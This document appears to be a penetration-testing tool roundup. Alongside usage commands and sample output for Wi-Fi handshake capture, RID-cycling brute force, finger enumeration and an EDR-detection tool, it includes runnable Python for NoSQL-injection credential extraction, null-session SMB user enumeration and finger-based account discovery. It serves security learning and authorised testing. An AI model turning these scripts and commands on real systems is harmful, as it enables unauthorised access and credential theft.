Scan and Discovery
nmapAutomator: A script you can run in the background! Useful for running during your enum exercise. I used it during my OSCP certification!
RustScan: The Modern Port Scanner. Find ports quickly (3 seconds at its fastest). Run scripts through our scripting engine (Python, Lua, Shell supported).
dscan: Distributed Nmap, wrapper around Nmap to allow distributed network enumeration.
% dscan --name project_name srv --config dscan.conf targets.txt

Distributed Scan Status
========================

--------- ---------------- ------------
N Stages  N Pending Tasks  Completion %
--------- ---------------- ------------
4         0                0.00%

--------- ---------- ----------- ------------
Stage     N Targets  N Finished  Completion %
--------- ---------- ----------- ------------
discovery 1          0           0.00%

--------------- --------- ----------- ------------
Agent           Stage     Task Status Target Ip
--------------- --------- ----------- ------------
127.0.0.1:53281 discovery DOWNLOADING 127.0.0.1/32

The srv mode runs the coordinating server; the status tables show the pipeline stages, how many targets each stage has finished, and which agent (127.0.0.1:53281 above) is currently working on which target.
hcxdumptool: Small tool to capture packets from wlan devices.
sudo hcxdumptool -i wlp39s0f3u4u5 -o output.pcapng -t 5 --enable_status=3

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan0
FILTERLIST...............: 0 entries
MAC CLIENT...............: f0a225a8faa8
MAC ACCESS POINT.........: 00bb3a4250d5 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 61585
ANONCE...................: 765e00f3f9788ebf2df96c69ee9806b19df6105b2c39b389d76d4d85ee5f0f66

[10:37:11 - 001] 00156d9a26c0 -> f0a225a8faa8 Anan Apartment [PROBERESPONSE, SEQUENCE 2696, AP CHANNEL 1]
[10:37:12 - 001] 6c8dc120891f -> ffffffffffff Anan Apartment [PROBEREQUEST, SEQUENCE 2643]
[10:37:12 - 001] 00bb3a4250d6 -> 6c8dc120891f Anan Apartment [PROBERESPONSE, SEQUENCE 0, AP CHANNEL 1]
[10:37:12 - 001] 70778110c833 -> 00156d9a26c0 [PROBEREQUEST, SEQUENCE 256]
[10:37:32 - 009] 403decc272b8 -> 2c5bb8742b39 Paangoon_2G [PROBERESPONSE, SEQUENCE 1940, AP CHANNEL 9]
[10:37:36 - 011] ec1f72b8f3d1 -> f0a225a8faa8 Muay [PROBERESPONSE, SEQUENCE 2902, AP CHANNEL 11]
[10:37:38 - 011] 083e8eaa328b -> ffffffffffff Muay [PROBEREQUEST, SEQUENCE 9]
[10:37:38 - 011] 00bb3a4250d7 -> 083e8eaa328b Muay [PROBERESPONSE, SEQUENCE 9, AP CHANNEL 11]
[10:37:39 - 011] 083e8eaa328b -> ec1f72b8f3d1 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 14306]
[10:37:39 - 011] ec1f72b8f3d1 -> 083e8eaa328b [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 7419]
[10:37:50 - 002] 4c189a2fb76e -> ffffffffffff Topline_Wifi [PROBEREQUEST, SEQUENCE 344]
[10:37:50 - 002] 00bb3a4250d8 -> 4c189a2fb76e Topline_Wifi [PROBERESPONSE, SEQUENCE 10, AP CHANNEL 2]
[10:38:01 - 008] b6b98a73aa05 -> f0a225a8faa8 Panmongkon [PROBERESPONSE, SEQUENCE 1433, AP CHANNEL 8]
[10:38:01 - 008] b6b98a73e88a -> f0a225a8faa8 Panmongkon [PROBERESPONSE, SEQUENCE 3790, AP CHANNEL 8]
[10:38:20 - 001] 74da38b04d5a -> ffffffffffff seasun [PROBEREQUEST, SEQUENCE 3235]
[10:38:20 - 001] 00bb3a4250d9 -> 74da38b04d5a seasun [PROBERESPONSE, SEQUENCE 25, AP CHANNEL 1]
INFO: cha=9, rx=13802, rx(dropped)=1073, tx=319, powned=2, err=0

Each FOUND ... HANDSHAKE line is a captured 4-way handshake (the running total is the powned= counter in the INFO line); the pcapng is converted for hashcat with hcxpcapngtool -o hash.22000 output.pcapng. The flags above are from an older release, so check hcxdumptool --help for the version you have installed, and only capture on networks you are authorised to test.
Penetration Testing Tools
Nosql-MongoDB-injection-username-password-enumeration: Using this script, we can enumerate usernames and passwords of NoSQL (MongoDB) injection-vulnerable web applications. It sends MongoDB query operators such as $regex in the login fields and uses the login response as a true/false oracle to recover each value character by character. In the usage below, -up and -pp name the form's username and password parameters, -ep the parameter to enumerate and -op any other parameters the form needs.
python nosqli-user-pass-enum.py -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit
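The oracle technique behind this kind of script, as an added example that is not the tool's own code: a vulnerable login handler that copies request parameters straight into a MongoDB-style query, a hardened one that only accepts strings, and an enumerator that recovers every username (and then each user's password) with $regex prefixes, branching so that users sharing a prefix are all found. The in-memory USERS collection, the mongo_match evaluator and all names are constructed for this example; the real script talks HTTP to the target instead.

```python
import re
import string

# Constructed in-memory stand-in for a MongoDB "users" collection; not real data.
USERS = [
    {"username": "admin", "password": "s3cret!"},
    {"username": "alice", "password": "hunter2"},
]

# Character set tried at each position; re.escape() keeps metacharacters literal.
ALPHABET = string.ascii_letters + string.digits + string.punctuation


def mongo_match(doc, query):
    """Evaluate a query against one document, honouring the two operators the
    injection relies on: $regex (prefix probing) and $ne (bypassing the field
    we are not interested in). Plain values are compared for equality."""
    for field, cond in query.items():
        value = doc.get(field)
        if isinstance(cond, dict):
            if "$regex" in cond and not re.search(cond["$regex"], str(value)):
                return False
            if "$ne" in cond and value == cond["$ne"]:
                return False
        elif value != cond:
            return False
    return True


def vulnerable_login(params):
    """Vulnerable handler: request parameters go into the query unchanged, so
    username[$regex]=^a reaches the database as a real operator."""
    query = {"username": params["username"], "password": params["password"]}
    return any(mongo_match(user, query) for user in USERS)


def hardened_login(params):
    """Fixed handler: only string values may reach the query."""
    username, password = params.get("username"), params.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return False
    return vulnerable_login({"username": username, "password": password})


def enumerate_values(login, field, fixed, alphabet=ALPHABET, max_len=32):
    """Recover every value of `field` among documents matching `fixed`, using
    the login result as a boolean oracle. Each accepted prefix is extended by
    one character; a value is reported when the anchored ^prefix$ matches."""
    found = []

    def extend(prefix):
        if len(prefix) >= max_len:
            return
        if prefix and login({field: {"$regex": "^" + re.escape(prefix) + "$"}, **fixed}):
            found.append(prefix)
        for ch in alphabet:
            probe = {field: {"$regex": "^" + re.escape(prefix + ch)}, **fixed}
            if login(probe):
                extend(prefix + ch)

    extend("")
    return found


if __name__ == "__main__":
    users = enumerate_values(vulnerable_login, "username", {"password": {"$ne": ""}})
    print("usernames:", users)
    for user in users:
        print(user, "->", enumerate_values(vulnerable_login, "password", {"username": user}))
    print("hardened:", enumerate_values(hardened_login, "username", {"password": {"$ne": ""}}))
```

Password recovery only works where the application compares the submitted password against the stored value inside the query; against hashed passwords the username enumeration still works, and the password step yields nothing.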
nullinux: Nullinux is an internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB. If no username and password are provided in the command line arguments, an anonymous login, or null session, is attempted. Nullinux acts as a wrapper around the Samba tools smbclient & rpcclient to enumerate hosts using a variety of techniques.
ridenum: A simple open-source tool for null-session RID cycling: it fetches the domain SID over an anonymous SMB/RPC session, resolves the SIDs for a range of RIDs to user names, and can then brute-force those accounts against a password list. The arguments are target, start RID, end RID, and optionally a password file and a username file.

./ridenum.py 192.168.1.50 500 50000 /root/dict.txt /root/user.txt
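The RID-cycling step that ridenum and nullinux wrap around rpcclient, as an added example that is not either tool's own code: build the null-session rpcclient invocations (lsaquery for the domain SID, then lookupsids in batches), and parse the result lines into RID, domain, name and SID type so that user accounts (type 1) can be separated from groups and from RIDs that do not exist. The sample lsaquery and lookupsids output, the host and the batch size are constructed for this example; the `*unknown*` rendering of unresolved SIDs is assumed from current Samba output and the parser falls back on the numeric type code rather than that string.

```python
import re
import subprocess

# One rpcclient "lookupsids" result line (Samba):  S-1-5-21-...-500 CORP\Administrator (1)
# The number is the SID_NAME_USE type: 1=user, 2=domain group, 4=alias,
# 5=well-known group, 8=unknown (nothing is assigned to that RID).
LOOKUP_LINE = re.compile(r"^(S-1-5-[0-9-]+)\s+([^\\\s]+)\\(.+?)\s+\((\d+)\)\s*$")
SID_TYPE_USER, SID_TYPE_DOM_GRP = 1, 2


def parse_lsaquery(output):
    """Pull the domain SID out of 'rpcclient -c lsaquery' output."""
    m = re.search(r"Domain Sid:\s*(S-1-5-21-[0-9-]+)", output)
    return m.group(1) if m else None


def parse_lookupsids(output):
    """Return (rid, domain, name, type) for every resolved SID line."""
    results = []
    for line in output.splitlines():
        m = LOOKUP_LINE.match(line.strip())
        if not m:
            continue
        sid, domain, name, sid_type = m.groups()
        results.append((int(sid.rsplit("-", 1)[1]), domain, name, int(sid_type)))
    return results


def users_from_lookup(output):
    """Names with SID type 1 (user accounts), in RID order."""
    return [name for rid, _, name, t in sorted(parse_lookupsids(output)) if t == SID_TYPE_USER]


def rpcclient_argv(target, command):
    """Null-session invocation: empty user name, -N suppresses the password prompt."""
    return ["rpcclient", "-U", "", "-N", target, "-c", command]


def lookup_commands(target, domain_sid, rids, batch=50):
    """Split the RID range into lookupsids calls of `batch` SIDs each."""
    rids = list(rids)
    cmds = []
    for i in range(0, len(rids), batch):
        sids = " ".join(f"{domain_sid}-{rid}" for rid in rids[i:i + batch])
        cmds.append(rpcclient_argv(target, "lookupsids " + sids))
    return cmds


def rid_cycle(target, start=500, end=1500, batch=50):
    """Live version: query the domain SID, then resolve every RID in range."""
    lsa = subprocess.run(rpcclient_argv(target, "lsaquery"), capture_output=True, text=True)
    domain_sid = parse_lsaquery(lsa.stdout)
    if not domain_sid:
        raise RuntimeError("null session refused or no domain SID: " + lsa.stderr.strip())
    users = []
    for argv in lookup_commands(target, domain_sid, range(start, end + 1), batch):
        out = subprocess.run(argv, capture_output=True, text=True).stdout
        users.extend(users_from_lookup(out))
    return users


# Constructed sample output (not captured from a real host) for offline use.
SAMPLE_LSAQUERY = "Domain Name: CORP\nDomain Sid: S-1-5-21-1004336348-1177238915-682003330\n"
SAMPLE_LOOKUP = """\
S-1-5-21-1004336348-1177238915-682003330-500 CORP\\Administrator (1)
S-1-5-21-1004336348-1177238915-682003330-501 CORP\\Guest (1)
S-1-5-21-1004336348-1177238915-682003330-502 *unknown*\\*unknown* (8)
S-1-5-21-1004336348-1177238915-682003330-512 CORP\\Domain Admins (2)
S-1-5-21-1004336348-1177238915-682003330-1105 CORP\\svc_backup (1)
"""

if __name__ == "__main__":
    print(parse_lsaquery(SAMPLE_LSAQUERY))
    print(users_from_lookup(SAMPLE_LOOKUP))
    # Against a live host: print(rid_cycle("192.168.1.50", 500, 50000))
```

If lsaquery comes back empty the host does not allow anonymous RPC binds (RestrictAnonymous or SMB signing requirements), and the rest of the cycle will fail the same way; that is the first thing to check before widening the RID range.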
tomcat-weak-password-scanner: Tomcat password brute-force.
SharpEDRChecker: Checks running processes and their metadata, the DLLs loaded into your current process and each DLL's metadata, common install directories, installed services and each service binary's metadata, and installed drivers and each driver's metadata, all for the presence of known defensive products such as AVs, EDRs and logging tools.
finger-user-enum: finger-user-enum (Solaris OS) is a tool for enumerating OS-level user accounts via the finger service. As of release v1.0 it is known to work against the default Solaris daemon. It may not yet work against all daemons since there is no defined format for the data returned by the finger service.
$ ./finger-user-enum.pl -U users.txt -t 10.0.0.1
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Worker Processes ......... 5
Usernames file ........... users.txt
Target count ............. 1
Username count ........... 47
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used

######## Scan started at Sun Jan 21 19:44:22 2007 #########
root@10.0.0.1: root Super-User console 2:03 Wed 07:23 ..
bin@10.0.0.1: bin ??? pts/1 <Dec 21 13:04> 10.0.0.99
daemon@10.0.0.1: daemon ??? < . . . . >..
adm@10.0.0.1: adm Admin < . . . . >..
lp@10.0.0.1: lp Line Printer Admin < . . . . >..
uucp@10.0.0.1: uucp Admin < . . . . >..
nobody4@10.0.0.1: nobody4 SunOS 4.x Nobody < . . . . >..
ftp@10.0.0.1: ftp Anonymous FTPUser 674 <Aug 11 14:22> 10.0.0.99
######## Scan completed at Sun Jan 21 19:44:23 2007 #########
8 results.

47 queries in 1 seconds (47.0 queries / sec)
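Because, as noted above, there is no defined format for finger replies, the robust way to decide whether an account exists is differential: compare each reply with the reply for a name that certainly does not exist. The following is an added example of that approach in Python, not pentestmonkey's script: a minimal RFC 1288 client plus a normaliser that masks the queried name and column padding before comparing. The Solaris-style replies in SAMPLE_REPLIES, the sample_query stand-in for the daemon and the baseline name zzqxvwk are constructed for this example.

```python
import re
import socket

FINGER_PORT = 79

# Constructed Solaris-style replies (not captured from a real host). Unknown
# names get only "???" in the Name column; real accounts carry a last-login
# field or "< . . . . >" for never-logged-in accounts.
HEADER = "Login       Name               TTY         Idle    When    Where\n"
SAMPLE_REPLIES = {
    "zzqxvwk": HEADER + "zzqxvwk          ???\n",
    "daemon":  HEADER + "daemon           ???                        < .  .  .  . >\n",
    "root":    HEADER + "root     Super-User            console      2:03 Wed 07:23\n",
}


def sample_query(user):
    """Offline stand-in for a finger daemon: any name not in the table is unknown."""
    return SAMPLE_REPLIES.get(user, HEADER + user + "   ???\n")


def finger_request(user):
    """RFC 1288 query: the name followed by CRLF."""
    return (user + "\r\n").encode("ascii")


def finger(host, user, timeout=5.0):
    """Send one query and return the whole reply; the server closes the socket."""
    with socket.create_connection((host, FINGER_PORT), timeout=timeout) as sock:
        sock.sendall(finger_request(user))
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1", "replace")


def fingerprint(reply, user):
    """Normalise a reply so only account-dependent content remains: mask the
    queried name, collapse column padding, drop blank lines and the header."""
    masked = re.sub(re.escape(user), "<USER>", reply)
    lines = [re.sub(r"\s+", " ", line).strip() for line in masked.splitlines()]
    return "\n".join(line for line in lines if line and not line.startswith("Login "))


def user_exists(reply, user, baseline_reply, baseline_user):
    """An account exists if its normalised reply differs from the reply for a
    name that certainly does not exist."""
    return fingerprint(reply, user) != fingerprint(baseline_reply, baseline_user)


def enumerate_users(query, candidates, baseline_user="zzqxvwk"):
    """Run the differential check over a candidate list; `query` maps a name
    to the daemon's reply (sample_query offline, finger() live)."""
    baseline = query(baseline_user)
    return [u for u in candidates if user_exists(query(u), u, baseline, baseline_user)]


if __name__ == "__main__":
    print(enumerate_users(sample_query, ["root", "daemon", "bob", "ftp"]))
    # Live target: enumerate_users(lambda u: finger("10.0.0.1", u), names)
```

If the daemon answers every name identically (or with nothing at all), every candidate comes back as non-existent; that is the correct result, and it tells you the service is not usable as an enumeration oracle rather than that the accounts are absent. Use a fresh random baseline name per run so the comparison cannot be skewed by a coincidentally real account.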